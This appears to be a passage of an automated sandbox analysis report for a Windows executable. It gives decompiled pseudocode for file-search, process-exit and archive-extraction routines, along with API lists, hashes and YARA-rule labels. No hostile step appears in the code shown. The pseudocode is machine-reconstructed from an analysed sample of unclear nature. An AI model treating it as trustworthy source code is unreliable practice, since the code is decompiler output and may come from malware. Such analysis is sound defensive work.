              • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
              • String ID: PNG
              • API String ID: 4097654274-364855578
              • Opcode ID: 591dcd65581a5f701f914e397a43a24a0a43174384c1d9d846de0f3dd495e86d
              • Instruction ID: 839088163f7ee3b7b79ec26dd540b0a86f50e5fdb4f828c630e659cfd8ea2761
              • Opcode Fuzzy Hash: 591dcd65581a5f701f914e397a43a24a0a43174384c1d9d846de0f3dd495e86d
              • Instruction Fuzzy Hash: F7216471610315ABC721AF66DC99E3BBFADEF45790B090528F986D2260DB31CC04CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7A2DF, Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E00D7A2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E00D8D940();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E00D7FAB1(_t84, _a4696, 0x800);
						_push(0x800);
						E00D7B9B9(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E00D80A81(_t84 + 0x1010, _t82,  &_v4);
						E00D80A81(_t84 + 0x1018, _t82,  &_v24);
						E00D80A81(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E00D7B32C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}






















              0x00d7a2df
              0x00d7a2e4
              0x00d7a2ea
              0x00d7a2ec
              0x00d7a2f8
              0x00d7a2ff
              0x00d7a302
              0x00d7a305
              0x00d7a37a
              0x00d7a380
              0x00d7a382
              0x00d7a384
              0x00d7a386
              0x00d7a38c
              0x00d7a38f
              0x00d7a38f
              0x00d7a392
              0x00d7a392
              0x00d7a398
              0x00d7a39a
              0x00000000
              0x00000000
              0x00d7a307
              0x00d7a314
              0x00d7a316
              0x00d7a31a
              0x00d7a3a0
              0x00d7a3ae
              0x00d7a3b3
              0x00d7a3ba
              0x00d7a3c5
              0x00d7a3c5
              0x00d7a3c9
              0x00d7a3d3
              0x00d7a3d6
              0x00d7a3e0
              0x00d7a3ea
              0x00d7a3f4
              0x00d7a3fe
              0x00d7a408
              0x00d7a412
              0x00d7a41c
              0x00d7a429
              0x00d7a439
              0x00d7a449
              0x00d7a320
              0x00d7a33b
              0x00d7a352
              0x00d7a352
              0x00d7a35b
              0x00d7a36c
              0x00d7a36c
              0x00d7a367
              0x00d7a369
              0x00d7a369
              0x00d7a36e
              0x00d7a33d
              0x00d7a34a
              0x00d7a34c
              0x00d7a350
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7a350
              0x00d7a33b
              0x00d7a31a
              0x00d7a44e
              0x00d7a461

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D7A1DA,000000FF,?,?), ref: 00D7A314
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D7A1DA,000000FF,?,?), ref: 00D7A34A
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D7A1DA,000000FF,?,?), ref: 00D7A352
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D7A1DA,000000FF,?,?), ref: 00D7A37A
              • GetLastError.KERNEL32(?,?,?,?,00D7A1DA,000000FF,?,?), ref: 00D7A386
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 71d8a9dd2d2a7316c6f68b1ca67aeb7a55826216b70647a9c1eb08fc5aa6c8fc
              • Instruction ID: 339431b5b8ad13787865ca0a5baf679ebc47a91ffce111dbf776aae216e20075
              • Opcode Fuzzy Hash: 71d8a9dd2d2a7316c6f68b1ca67aeb7a55826216b70647a9c1eb08fc5aa6c8fc
              • Instruction Fuzzy Hash: EC415172604341AFC324EF68C880ADEF7E8FB89350F044A1AF59DD3240E775A9548BB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D96AF3, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D96AF3(int _a4) {
				void* _t14;
				void* _t16;

				if(E00D99D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00D96B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





              0x00d96aff
              0x00d96b1b
              0x00d96b1b
              0x00d96b24
              0x00d96b2d

              APIs
              • GetCurrentProcess.KERNEL32(?,?,00D96AC9,?,00DAA800,0000000C,00D96C20,?,00000002,00000000), ref: 00D96B14
              • TerminateProcess.KERNEL32(00000000,?,00D96AC9,?,00DAA800,0000000C,00D96C20,?,00000002,00000000), ref: 00D96B1B
              • ExitProcess.KERNEL32 ref: 00D96B2D
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 66cb98688cd196df1bde14dfbf3c392632ce8c3ae86a07e18d4095cd1a13b94c
              • Instruction ID: c39ab10b167f6bf4cd626733f2f81ff6df4faa40e421e5c19f93115e576b0a09
              • Opcode Fuzzy Hash: 66cb98688cd196df1bde14dfbf3c392632ce8c3ae86a07e18d4095cd1a13b94c
              • Instruction Fuzzy Hash: B5E0B631000208ABCF116F69DD49A683F69EB55745B044414FA09CA231DB35DD52CBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D783C0, Relevance: 3.9, APIs: 2, Instructions: 940COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 68%
              			E00D783C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E00D8D870(E00DA12F2, _t706);
				E00D8D940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E00D75C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E00D71F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E00D7AFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E00D72005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E00D7B8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E00D7B8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E00D80FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E00D780B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E00D76EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E00D7A1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E00D77BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E00D7807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E00D7C634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L00D7E724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E00D7943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E00D72005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E00D7946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00D71E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E00D7A728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									E00D7A728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E00D7C67C(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E00D82842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E00D824D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E00D7910B(_t574, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E00D71E3B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E00D7A12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E00D76BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E00D79BD6(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E00D79A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E00D794DA(_t340);
																																						E00D77A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
																																						E00D79A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t613;
																																				if(_t613 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t460 =  *(_t683 + 8);
																																			__eflags =  *((char*)(_t460 + 0x6198));
																																			if( *((char*)(_t460 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																			goto L200;
																																		}
																																		__eflags = _t611;
																																		if(_t611 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t574 + 0x3380) - 5;
																																		if( *(_t574 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t674;
																																		if(_t674 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t574 + 0x3380) - 4;
																																if( *(_t574 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t674;
																																if(_t674 == 0) {
																																	goto L189;
																																}
																																_t611 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x12));
																															if( *((char*)(_t706 - 0x12)) == 0) {
																																goto L185;
																															}
																															__eflags = _t610;
																															if(_t610 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
																															if(__eflags == 0) {
																																L183:
																																_t311 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(3);
																																L184:
																																E00D76BF5(__eflags);
																																 *((char*)(_t706 - 0xe)) = 1;
																																E00D76E03(0xdb00e0, 3);
																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
																																L181:
																																__eflags =  *((char*)(_t683 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t309 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t574 + 0x6cc4) - _t610;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t574 + 0x32e4) - _t436;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t610;
																															if(_t610 != 0) {
																																 *((char*)(_t683 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t574 + 0x32e0) - _t436;
																														if( *(_t574 + 0x32e0) <= _t436) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t683 + 0xf3)) = _t436;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t469 = E00D7A6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
																												__eflags = _t469;
																												if(_t469 == 0) {
																													goto L166;
																												}
																												_t610 = 1;
																												_t436 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t574 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_t262 = _t706 - 0x41a8; // -14760
